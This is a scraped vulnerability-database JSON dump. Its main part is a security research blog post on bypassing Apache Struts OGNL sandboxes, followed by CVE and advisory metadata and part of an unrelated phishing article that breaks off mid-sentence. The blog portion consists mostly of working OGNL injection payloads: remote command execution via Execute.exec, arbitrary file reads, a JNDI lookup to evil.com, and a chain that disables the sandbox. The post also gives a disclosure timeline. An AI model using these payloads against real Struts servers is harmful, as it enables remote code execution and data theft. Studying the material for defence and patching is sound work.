been invoked. This implies that if I find `.freemarker.TemplateModel` on the request scope, my injection was evaluated after the action invocation finished building the action\u2019s `Result` object and, therefore, my injection probably did not take place as part of the Struts code but as a [double evaluation in the FreeMarker template](<https://securitylab.github.com/advisories/GHSL-2020-205-double-eval-dynattrs-struts2/>).\n\nThese new objects will offer new ways to get remote code execution, but only if you are lucky to get your injection evaluated after the action\u2019s `Result` has been built. Or not? ![\ud83e\udd14](https://s.w.org/images/core/emoji/14.0.0/72x72/1f914.png)\n\nIt turned out that the ongoing `ActionInvocation` object can be accessed through the OGNL context and, therefore, we can use it to force the building of the `Result` object in advance. Calling the `Result`s `doExecute()` method will trigger the population of the so-called template model. For example, for Freemarker, `ActionInvocation.createResult()` will create a `FreemarkerResult` instance. Calling its `doExecute()` method will, in turn, call its `[createModel()](<https://github.com/apache/struts/blob/266d2d4ed526edbb8e8035df94e94a1007d7c360/core/src/main/java/org/apache/struts2/views/freemarker/FreemarkerResult.java#L273>)` method that will populate the template model.\n \n \n \n (#ai=#attr['com.opensymphony.xwork2.ActionContext.actionInvocation'])+\n \n (#ai.setResultCode(\"success\"))+\n \n (#r=#ai.createResult())+\n \n (#r.doExecute(\"pages/test.ftl\",#ai))\n \n \n\nExecuting the above payload will populate the request context with new objects. However, that requires us to know the result code and the template\u2019s path. Fortunately, we can also invoke the `ActionInvocation.invoke()` method that will take care of everything for us!\n \n \n \n #attr['com.opensymphony.xwork2.ActionContext.actionInvocation'].invoke()\n \n \n\nThe line above will result in the template model being populated and stored in the request, and context scopes regardless of where your injection takes place.\n\n### Wild objects appeared[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#wild-objects-appeared>)\n\nAfter the invocation, the request scope and value stack will be populated with additional objects. These objects vary depending on the view layer used. What follows is a list of the most interesting ones (skipping most of them which do not lead to RCE):\n\nFor Freemarker:\n\n * `.freemarker.Request` (`freemarker.ext.servlet.HttpRequestHashModel`)\n * `.freemarker.TemplateModel` (`org.apache.struts2.views.freemarker.ScopesHashModel`) \n * `__FreeMarkerServlet.Application__` (`freemarker.ext.servlet.ServletContextHashModel`) \n * `JspTaglibs` (`freemarker.ext.jsp.TaglibFactory`)\n * `.freemarker.RequestParameters` (`freemarker.ext.servlet.HttpRequestParametersHashModel`)\n * `.freemarker.Request` (`freemarker.ext.servlet.HttpRequestHashModel`)\n * `.freemarker.Application` (`freemarker.ext.servlet.ServletContextHashModel`) \n * `.freemarker.JspTaglibs` (`freemarker.ext.jsp.TaglibFactory`) \n * `ognl` (`org.apache.struts2.views.jsp.ui.OgnlTool`) \n * `stack` (`com.opensymphony.xwork2.ognl.OgnlValueStack`) \n * `struts` (`org.apache.struts2.util.StrutsUtil`) \n\nFor JSPs:\n\n * `com.opensymphony.xwork2.dispatcher.PageContext` (`PageContextImpl`)\n\nFor Velocity:\n\n * `.KEY_velocity.struts2.context` -> (`StrutsVelocityContext`) \n * `ognl` (`org.apache.struts2.views.jsp.ui.OgnlTool`)\n * `struts` (`org.apache.struts2.views.velocity.result.VelocityStrutsUtils`)\n\n### Getting RCE with new objects[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#getting-rce-with-new-objects>)\n\nAnd now let\u2019s have some fun with these new objects! In the following section I will explain how I was able to leverage some of these objects to get remote code execution.\n\n#### ObjectWrapper[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#objectwrapper>)\n\nThere may be different ways to get an instance of a FreeMarker\u2019s `ObjectWrapper`, even if the application is not using FreeMarker as its view layer because Struts uses it internally for rendering JSP tags. A few of them are listed below:\n\n * Through `freemarker.ext.jsp.TaglibFactory.getObjectWrapper()`. Even though Struts\u2019 sandbox forbids access to `freemarker.ext.jsp` package, we can still access it using a BeanMap:\n \n \n \n (#a=#@org.apache.commons.collections.BeanMap@{ })+\n \n (#a.setBean(#application[\".freemarker.JspTaglibs\"]))+\n \n (#a['objectWrapper'])\n \n \n\n * Through `freemarker.ext.servlet.HttpRequestHashModel.getObjectWrapper()`:\n \n \n \n (#request.get('.freemarker.Request').objectWrapper)\n \n \n\n * Through `freemarker.core.Configurable.getObjectWrapper()`. We need to use the BeanMap trick to access it since `freemarker.core` is also blocklisted:\n \n \n \n (#a=#@org.apache.commons.collections.BeanMap@{ })+\n \n (#a.setBean(#application['freemarker.Configuration']))+\n \n #a['objectWrapper']\n \n \n\nNow for the fun part, what can we do with an `ObjectWrapper`? There are three interesting methods we can leverage to get RCE:\n\n**`newInstance(class, args)`**\n\nThis method will allow us to instantiate an arbitrary type. Arguments must be wrapped, but the return value is not. For example, we can trigger a JNDI injection lookup:\n \n \n \n objectWrapper.newInstance(@javax.naming.InitialContext@class,null).lookup(\"ldap://evil.com\")\n \n \n\nOr, if Spring libs are available, we can get RCE by supplying a malicious [XML config](<https://raw.githubusercontent.com/irsl/jackson-rce-via-spel/master/spel.xml>) for `FileSystemXmlApplicationContext` constructor:\n \n \n \n objectWrapper.newInstance(@org.springframework.context.support.FileSystemXmlApplicationContext@class,{#request.get('.freemarker.Request').objectWrapper.wrap(\"URL\")})\n \n \n\n`**getStaticModels()`**\n\nThis method allows us to get static fields from arbitrary types. The return object is wrapped in a FreeMarker\u2019s `TemplateModel` so we need to unwrap it. An example payload levering [Text4Shell](<https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text/>):\n \n \n \n objectWrapper.staticModels.get(\"org.apache.commons.text.lookup.StringLookupFactory\").get(\"INSTANCE\").getWrappedObject().scriptStringLookup().lookup(\"javascript:3+4\")\n \n \n\n`**wrapAsAPI()`**\n\nThis method allows us to wrap any object with a `freemarker.ext.beans.BeanModel` giving us indirect access to its getters and setters methods. Struts\u2019 sandbox will not have visibility on these calls and therefore they can be used to call any blocklisted method.\n\n * `BeanModel.get('field_name')` returns a `TemplateModel` wrapping the object.\n * `BeanModel.get('method_name')` returns either a `SimpleMethodModel` or `OverloadedMethodsModel` wrapping the method.\n\nWe can, therefore, call any blocklisted method with:\n \n \n \n objectWrapper.wrapAsAPI(blocked_object).get(blocked_method)\n \n \n\nThis call will return an instance of `TemplateMethodModelEx`. Its `[exec()](<https://freemarker.apache.org/docs/api/freemarker/template/TemplateMethodModelEx.html#exec-java.util.List->)` method is defined in the `freemarker.template` namespace and, therefore, trying to invoke this method will get blocked by the Struts sandbox. However, `TemplateMethodModelEx` is an interface and what we will really get is an instance of either `freemarker.ext.beans.SimpleMethodModel` or `freemarker.ext.beans.OverloadedMethodsModel`. Since the `exec()` methods on both of them are defined on the `freemarker.ext.beans` namespace, which is not blocklisted, their invocation will succeed. As we saw before, arguments need to be wrapped. As an example we can call the `File.createTempFile(\u201cPREFIX\u201d, \u201cSUFFIX\u201d)` using the following payload:\n \n \n \n objectWrapper.getStaticModels().get(\"java.io.File\").get(\"createTempFile\").exec({objectWrapper.wrap(\"PREFIX\"), objectWrapper.wrap(\"SUFFIX\")})\n \n \n\nWe can achieve the same by calling the `getAPI()` on any `freemarker.template.TemplateModelWithAPISupport` instance. Many of the FreeMarker exposed objects inherit from this interface and will allow us to wrap them with a `BeanModel`. For example, to list all the keys in the Struts Value Stack we can use:\n \n \n \n #request['.freemarker.TemplateModel'].get('stack').getAPI().get(\"context\").getAPI().get(\"keySet\").exec({})\n \n \n\nNote that `com.opensymphony.xwork2.util.OgnlContext.keySet()` would be blocked since it belongs to the `com.opensymphony.xwork2.util` namespace, but in this case, Struts\u2019 sandbox will only see calls to `TemplateHashModel.get()` and `TemplateModelWithAPISupport.getAPI()` which are both allowed.\n\nThe last payload will give us a complete list of all available objects in the Value Stack, many of which could be used for further attacks. Lets see a more interesting example by reading an arbitrary file using `BeanModel`s:\n \n \n \n (#bw=#request.get('.freemarker.Request').objectWrapper).toString().substring(0,0)+\n \n (#f=#bw.newInstance(@java.io.File@class,{#bw.wrap(\"C:\\\\REDACTED\\\\WEB-INF\\\\web.xml\")}))+ \n \n (#p=#bw.wrapAsAPI(#f).get(\"toPath\").exec({}))+\n \n (#ba=#bw.getStaticModels().get(\"java.nio.file.Files\").get(\"readAllBytes\").exec({#bw.wrap(#p)}))+\n \n \"----\"+\n \n (#b64=#bw.getStaticModels().get(\"java.util.Base64\").get(\"getEncoder\").exec({}).getAPI().get(\"encodeToString\").exec({#bw.wrap(#ba)}))\n \n \n\nOr listing the contents of a directory:\n \n \n \n (#bw=#request.get('.freemarker.Request').objectWrapper).toString().substring(0,0)+\n \n (#dir=#bw.newInstance(@java.io.File@class,{#bw.wrap(\"C:\\\\REDACTED\\\\WEB-INF\\\\lib\")}))+ \n \n (#l=#bw.wrapAsAPI(#dir).get(\"listFiles\").exec({}).getWrappedObject())+\"---\"+\n \n (#l.{#this})\n \n \n\n#### OgnlTool/OgnlUtil[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#ognltool-ognlutil>)\n\nThe `org.apache.struts2.views.jsp.ui.OgnlTool` class was calling `Ognl.getValue()` with no `OgnlContext` and even though the Ognl library will take care of creating a default one, it will not include all the additional security checks added by the Struts framework and is easily bypassable:\n \n \n \n package org.apache.struts2.views.jsp.ui;\n \n import ognl.Ognl;\n \n import ognl.OgnlException;\n \n import com.opensymphony.xwork2.inject.Inject;\n \n public class OgnlTool {\n \n private OgnlUtil ognlUtil;\n \n public OgnlTool() { }\n \n \n \n @Inject\n \n public void setOgnlUtil(OgnlUtil ognlUtil) {\n \n this.ognlUtil = ognlUtil;\n \n }\n \n \n \n public Object findValue(String expr, Object context) {\n \n try {\n \n return Ognl.getValue(ognlUtil.compile(expr), context);\n \n } catch (OgnlException e) {\n \n return null;\n \n }\n \n }\n \n }\n \n \n\nWe can get an instance of `OgnlTool` from both FreeMarker and Velocity post-invocation contexts:\n \n \n \n #request['.freemarker.TemplateModel'].get('ognl')\n \n \n\nOr\n \n \n \n #request['.KEY_velocity.struts2.context'].internalGet('ognl')\n \n \n\nFor FreeMarker\u2019s case, it will come up wrapped with a Template model but we can just unwrap it and use it to get RCE:\n \n \n \n (#a=#request.get('.freemarker.Request').objectWrapper.unwrap(#request['.freemarker.TemplateModel'].get('ognl'),'org.apache.struts2.views.jsp.ui.OgnlTool'))+\n \n (#a.findValue('(new freemarker.template.utility.Execute()).exec({\"whoami\"})',null))\n \n \n\nOr, even simpler:\n \n \n \n #request['.freemarker.TemplateModel'].get('ognl').getWrappedObject().findValue('(new freemarker.template.utility.Execute()).exec({\"whoami\"})',{})\n \n \n\n`OgnlTool` was [inadvertently fixed](<https://github.com/apache/struts/commit/5cd409d382e00b190bfe4e957c4167d06b8f9da1#diff-55821720c975d84350d796bec09aa366cc2b2861fb7e12f223cc5a4453b55640>) when Struts 6.0.0 was released by upgrading to OGNL 3.2.2 which always requires a `MemberAccess`. But the latest Struts 2 version (2.5.30) is still vulnerable to this payload.\n\n#### StrutsUtil[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#strutsutil>)\n\nAnother object that can be accessed in the post-invocation context is an instance of `org.apache.struts2.util.StrutsUtil`. There are plenty of interesting methods in here:\n\n * `public String include(Object aName)` can be used to read arbitrary resources \n * `<struts_utils>.include(\"/WEB-INF/web.xml\")`\n * `public Object bean(Object aName)` can be used to instantiate arbitrary types: \n * `<struts_utils>.bean(\"javax.script.ScriptEngineManager\")`\n * `public List makeSelectList(String selectedList, String list, String listKey, String listValue)`\n * `listKey` and `listValue` are evaluated with OgnlTool and therefore in an unsandboxed context\n * `<struts_utils>.makeSelectList(\"#this\",\"{'foo'}\",\"(new freemarker.template.utility.Execute()).exec({'touch /tmp/bbbb'})\",\"\")`\n\nOn applications using Velocity as its view layer, this object will be an instance of `VelocityStrutsUtil` which extends `StrutsUtils` and provides an additional vector:\n\n * `public String evaluate(String expression)` will allow us to evaluate a string containing a velocity template:\n \n \n \n (<struts_utils>.evaluate(\"#set ($cmd='java.lang.Runtime.getRuntime().exec(\\\"touch /tmp/pwned_velocity\\\")') $application['org.apache.tomcat.InstanceManager'].newInstance('javax.script.ScriptEngineManager').getEngineByName('js').eval($cmd)\"))\n \n \n\n#### JspApplicationContextImpl[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#jspapplicationcontextimpl>)\n\nThe last vector that I wanted to share is one that I found a few years ago and that I was not able to exploit\u2013although I was pretty sure that there had to be a way. New post-invocation discovered objects finally made this possible!\n\nIf you have inspected the Struts Servlet context (`#application`) in the past you probably saw an item with key `org.apache.jasper.runtime.JspApplicationContextImpl` which returned an instance of `org.apache.jasper.runtime.JspApplicationContextImpl`. This class contains a method called `getExpressionFactory()` that returns an Expression Factory that will expose a `createValueExpression()` method. This looks like a perfect place to create an EL expression and evaluate it. The problem was that `[createValueExpression](<https://docs.oracle.com/javaee/7/api/javax/el/ExpressionFactory.html#createValueExpression-javax.el.ELContext-java.lang.String-java.lang.Class->)` requires an instance of `ELContext` and we had none.\n\nFortunately, our post-invocation technique brought a new object into play. When using JSPs as the view layer, `#request['com.opensymphony.xwork2.dispatcher.PageContext']` will return an uninitialized `org.apache.jasper.runtime.PageContextImpl` instance that we can use to create an `ELContext` and evaluate arbitrary EL expressions:\n \n \n \n (#attr['com.opensymphony.xwork2.ActionContext.actionInvocation'].invoke())+\n \n (#ctx=#request['com.opensymphony.xwork2.dispatcher.PageContext'])+\n \n (#jsp=#application['org.apache.jasper.runtime.JspApplicationContextImpl'])+\n \n (#elctx=#jsp.createELContext(#ctx))+\n \n (#jsp.getExpressionFactory().createValueExpression(#elctx, '7*7', @java.lang.Class@class).getValue(#elctx))\n \n \n\nThe avid readers may be wondering why Struts stores the `PageContext` in the request. Well, turns out, it does not, but we can access it through chained contexts.\n\nWhen accessing `#attr` (`AttributeMap`), [we can indirectly look into multiple scopes](<https://struts.apache.org/maven/struts2-core/apidocs/org/apache/struts2/util/AttributeMap.html>) such as the Page, Request, Session and Application (Servlet). But there is more, `org.apache.struts2.dispatcher.StrutsRequestWrapper.getAttribute()` will look for the attribute in the `ServletRequest`, if it can't find it there, [it will search the value stack](<https://github.com/apache/struts/blob/master/core/src/main/java/org/apache/struts2/dispatcher/StrutsRequestWrapper.java#L94>)! So, we can effectively access the value stack through the `#request` or `#attr` variables.\n\nIn this case, the `PageContext` was not stored in the request scope, but in the Value stack, and we are able to access it through chained context searches.\n\nWe can even run arbitrary OGNL expressions as long as they don\u2019t contain any hashes (`#`), for example, `#request[\"@java.util.HashMap@class\"]` will return the `HashMap` class.\n\n### Leveling up the BeanMap payload[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#leveling-up-the-beanmap-payload>)\n\nYou may already be familiar with McOwn\u2019s [technique](<https://mc0wn.blogspot.com/2021/04/exploiting-struts-rce-on-2526.html>). He realized that it was possible to use [OGNL Map notation](<https://commons.apache.org/proper/commons-ognl/language-guide.html>) to instantiate an `org.apache.commons.collections.BeanMap` by using the `#@org.apache.commons.collections.BeanMap@{ }` syntax, and then it was possible to wrap any Java object on this map and access any getters and setters as map properties. His payload was based on the `org.apache.tomcat.InstanceManager` payload we introduced at [Black Hat 2020](<https://i.blackhat.com/USA-20/Wednesday/us-20-Munoz-Room-For-Escape-Scribbling-Outside-The-Lines-Of-Template-Security-wp.pdf>) and looked like:\n \n \n \n (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n \n (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\n \n (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n \n (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\n \n (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\n \n (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\n \n (#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n \n (#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\n \n (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'calc.exe'}))\n \n \n\nThe payload was basically disabling the OGNL sandbox and then accessing otherwise blocked classes such as `InstanceManager`. There is a simpler way to abuse BeanMaps that do not require to disable the sandbox and that is using reflection:\n \n \n \n (#c=#@org.apache.commons.beanutils.BeanMap@{})+\n \n (#c.setBean(@Runtime@class))+\n \n (#rt=#c['methods'][6].invoke())+\n \n (#c['methods'][12]).invoke(#rt,'touch /tmp/pwned')\n \n \n\nThis payload also works in Struts 6 if the `BeanClass` is available in the classpath (either from Apache Commons Collections or Apache Commons BeanUtils), but you need to specify the FQN (Fully Qualified Name) name for `Runtime`: `@java.lang.Runtime@class`.\n\n### Timeline[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#timeline>)\n\nThese bypasses were first reported to the Struts and OGNL security teams on June 9, 2022.\n\nOn October 7, 2022, the security team replied to us and stated that improving the block lists was not a sustainable solution, and, therefore, they decided to stop doing it. They highlighted that a [Java Security Manager can be configured](<https://struts.apache.org/security/#proactively-protect-from-ognl-expression-injections-attacks-if-easily-applicable>) to protect every OGNL evaluation from these attacks and we highly recommend doing so if you are running a Struts application. However, bear in mind that the [Security Manager is deprecated](<https://openjdk.org/jeps/411>) and will soon get removed from the JDK.\n\n## That\u2019s a wrap[](<https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/#thats-a-wrap>)\n\nAt this point, you will have probably realized that sandboxing an expression language, such as OGNL, is a really difficult task, and may require maintaining a list of blocked classes and OGNL features even though that is not an optimal approach. In this blog post, we have reviewed a few ways in which these sandboxes can be bypassed. Although they are specific to OGNL, hopefully you have learned to explore sandbox controls\u2013and one or two new tricks\u2013that may apply to other sandboxes. In total, we were able to raise $5,600, which we donated to [UNHCR](<https://www.unhcr.org/>) to help provide refuge for Ukrainians seeking protection from the war.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2023-01-27T16:00:49", "type": "github", "title": "Bypassing OGNL sandboxes for fun and charities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-3087", "CVE-2016-4436", "CVE-2017-5638", "CVE-2018-11776", "CVE-2018-1327", "CVE-2020-17530", "CVE-2021-26084", "CVE-2022-26134"], "modified": "2023-01-27T13:33:03", "id": "GITHUB:0519EA92487B44F364A1B35C85049455", "href": "https://github.blog/2023-01-27-bypassing-ognl-sandboxes-for-fun-and-charities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T17:29:49", "description": "Apache Struts contains a Remote Code Execution when using results with no namespace and it's upper actions have no or wildcard namespace. The same flaw exists when using a url tag with no value, action set, and it's upper actions have no or wildcard namespace.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-10-18T19:24:38", "type": "github", "title": "Apache Struts vulnerable to remote command execution (RCE) due to improper input validation", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-11-04T05:05:10", "id": "GHSA-CR6J-3JP9-RW65", "href": "https://github.com/advisories/GHSA-cr6j-3jp9-rw65", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-12-03T15:06:27", "description": "A vulnerability has been identified in Mendix Forgot Password Appstore module (All versions >= V3.3.0 < V3.5.1), Mendix Forgot Password Appstore module (Mendix 7 compatible) (All versions < V3.2.2). Initial passwords are generated in an insecure manner. This could allow an unauthenticated remote attacker to efficiently brute force passwords in specific situations.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-08T12:15:00", "type": "cve", "title": "CVE-2022-26314", "cwe": ["CWE-307"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26314"], "modified": "2022-03-11T19:04:00", "cpe": [], "id": "CVE-2022-26314", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-26314", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2023-12-03T14:27:57", "description": "Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible Remote Code Execution when alwaysSelectFullNamespace is true (either by user or a plugin like Convention Plugin) and then: results are used with no namespace and in same time, its upper package have no or wildcard namespace and similar to results, same possibility when using url tag which doesn't have value and action set and in same time, its upper package have no or wildcard namespace.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2018-08-22T13:29:00", "type": "cve", "title": "CVE-2018-11776", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776"], "modified": "2023-11-07T02:51:00", "cpe": ["cpe:/a:apache:struts:2.3.34", "cpe:/a:apache:struts:2.5.16"], "id": "CVE-2018-11776", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-11776", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:apache:struts:2.3.34:*:*:*:*:*:*:*", "cpe:2.3:a:apache:struts:2.5.16:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T14:55:03", "description": "In affected versions of Confluence Server and Data Center, an OGNL injection vulnerability exists that would allow an unauthenticated attacker to execute arbitrary code on a Confluence Server or Data Center instance. The affected versions are before version 6.13.23, from version 6.14.0 before 7.4.11, from version 7.5.0 before 7.11.6, and from version 7.12.0 before 7.12.5.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-30T07:15:00", "type": "cve", "title": "CVE-2021-26084", "cwe": ["CWE-917"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-08-08T14:21:00", "cpe": [], "id": "CVE-2021-26084", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-26084", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "cnvd": [{"lastseen": "2022-08-27T04:56:18", "description": "Forgot Password module allows users to register applications or reset their own passwords without the need for administrator involvement. .", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-09T00:00:00", "type": "cnvd", "title": "Siemens Mendix Forgot Password Appstore module\u5b58\u5728\u672a\u660e\u6f0f\u6d1e", "bulletinFamily": "cnvd", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26314"], "modified": "2022-03-09T00:00:00", "id": "CNVD-2022-17795", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2022-17795", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:25", "description": "Days after news broke last week that advanced, persistent threat actors penetrated nuclear facilities, researchers are explaining techniques used by adversaries to gain toeholds in similar targets in energy. Cisco Talos reported Friday that email-based attacks, leveraging template injection techniques, targeting nuclear facilities and others have been ongoing since May.\n\n\u201cTalos has observed attackers targeting critical infrastructure and energy companies around the world, primarily in Europe and the United States. These attacks target both the critical infrastructure providers, and the vendors those providers used to deliver critical services,\u201d [researchers wrote on Friday](<http://blog.talosintelligence.com/2017/07/template-injection.html#more>).\n\nAdversaries are leveraging classic Word document-based phishing attacks, they said. However, the Word document attachments used in the phishing campaigns do not contain malicious VBA macros or embedded scripting. Instead, attachments attempt to download a malicious template file over a Server Message Block (SMB) connection so that the user\u2019s credentials can be harvested, researchers said.\n\nCisco Talos did not claim this specific attack was used against Wolf Creek Nuclear Operating Corporation or in connection with any specific attack cited in a joint report issued by the Department of Homeland Security and the Federal Bureau of Investigation last week. Neither did researchers claim attacks had ever led to a hacker breaching or disrupting the core systems controlling operations at an energy plant.\n\n\u201cOne objective of this most recent attack appears to be to harvest credentials of users who work within critical infrastructure and manufacturing industries,\u201d Talos wrote.\n\nTargeted phishing attacks included DOCX type documents delivered as attachments under the guise of being an environmental report or a resume. While no malicious macros or scripting is embedded in the document, when a user opens it, a request is made via the SMB protocol for a template, as such \u201cContacting:\\\\\\ . . . \\Template.dotm.\u201d\n\n\u201cThe document was trying to pull down a template 